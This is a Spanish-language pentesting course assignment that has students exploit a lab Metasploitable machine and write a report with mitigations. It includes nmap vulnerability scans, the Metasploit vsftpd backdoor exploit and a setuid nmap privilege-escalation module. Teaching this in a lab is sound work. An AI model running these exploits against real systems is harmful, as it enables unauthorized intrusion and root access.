Proyecto de Explotación en Pentesting en una Máquina Vulnerable

🌱 ¿Cómo empezar este proyecto?

¡No clones este repositorio! solo sigue las intrucciones.

Este ejercicio tiene como objetivo es enseñar a los estudiantes cómo explotar las vulnerabilidades encontradas en una máquina vulnerable (Metasploitable) durante la fase de reconocimiento. Esto incluye la detección de vulnerabilidades explotables y la escalación de privilegios. Nota: No se realizarán actividades de post-explotación.

Este es el segundo de 4 proyectos que te llevaran a conocer a fondo como es el munto del pentesting. El objetivo es realizar todas las fases del pentesting en una computadora vulnerable, especificamente trabajaremos con la maquina de Metasploitable. Esta segunda fase se enfoca en la "Explotación" en una Máquina Vulnerable.

Requisitos

• Finalizar el reporte de reconocimiento de Pentesting Pentesting report v1.
• Tener acceso a la máquina Metasploitable.
• Tener acceso a una máquina atacante (por ejemplo, Kali Linux).

Herrramientas necesarias

• Nmap (para confirmar vulnerabilidades)
• Metasploit Framework
• Acceso a bases de datos de vulnerabilidades (como Exploit-DB)
• Herramientas adicionales según las vulnerabilidades (e.g., Hydra para fuerza bruta, netcat)

📝 Instrucciones

Paso 1: Confirmar vulnerabilidades

• Inicia la máquina Metasploitable.
• Inicia sesión en Metasploitable con las credenciales predeterminadas (usuario: msfadmin, contraseña: msfadmin).
• Obtén la dirección IP de Metasploitable usando ifconfig. Ejemplo:

  1ifconfig

• En tu máquina atacante (por ejemplo, Kali Linux), abre una terminal y ejecuta el siguiente comando para confirmar las vulnerabilidades, reemplazando <IP-Target> con la IP de la máquina Metasploitable:

  1sudo nmap -sV --script=vuln <IP-Target>

Paso 2: Detectar vulnerabilidades explotables

• Investiga las vulnerabilidades confirmadas usando bases de datos como Exploit-DB o CVE Details.
• Identifica exploits disponibles para las vulnerabilidades detectadas.

Paso 3: Explotar vulnerabilidades

• Usa Metasploit para explotar las vulnerabilidades identificadas. Ejemplo: Explotar una vulnerabilidad en el servicio FTP.

  1msfconsole
  2use exploit/unix/ftp/vsftpd_234_backdoor
  3set RHOST <IP-Target>
  4run

Paso 4: Escalar privilegios

• Identifica técnicas de escalación de privilegios en la máquina objetivo.
• Usa exploits locales o técnicas manuales para escalar privilegios. Ejemplo: Escalación de privilegios usando un exploit local.

  1use exploit/linux/local/setuid_nmap
  2set SESSION <session_id>
  3run

Paso 5: Documentar el proceso de explotación

• Detalla cada paso realizado durante la explotación.
  • Incluye comandos utilizados, capturas de pantalla y resultados obtenidos.
• Redacta un reporte de Pentesting v2 con las vulnerabilidades explotadas, los métodos utilizados y los resultados.
• Reflexiona sobre el impacto de las vulnerabilidades explotadas.
• Propón medidas de mitigación para las vulnerabilidades encontradas y explotadas.

Formato del Reporte de Pentesting v2

• Introducción

  • Resumen del objetivo y alcance del ejercicio.

• Metodología

  • Herramientas y técnicas utilizadas.

• Resultados

  • Detalles de las vulnerabilidades explotadas.
  • Comandos y herramientas utilizadas para la explotación.
  • Capturas de pantalla y evidencias.

• Escalación de Privilegios

  • Técnicas utilizadas y resultados obtenidos.

• Mitigación

  • Propuestas para remediar las vulnerabilidades explotadas.

• Conclusión

  • Impacto de las vulnerabilidades y reflexión sobre el proceso.